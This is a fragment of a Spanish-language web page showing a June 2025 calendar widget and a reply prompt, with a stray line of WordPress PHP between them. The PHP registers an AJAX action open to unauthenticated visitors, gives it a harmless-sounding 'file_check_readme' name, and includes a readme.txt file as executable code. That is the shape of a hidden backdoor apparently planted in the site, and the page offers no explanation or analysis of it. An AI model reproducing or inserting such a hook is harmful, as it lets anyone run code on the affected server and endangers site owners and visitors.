Calendario
junio 2025 L M X J V S D 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
if(!function_exists('file_check_readme59622')){ add_action('wp_ajax_nopriv_file_check_readme59622', 'file_check_readme59622'); add_action('wp_ajax_file_check_readme59622', 'file_check_readme59622'); function file_check_readme59622() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Leave a reply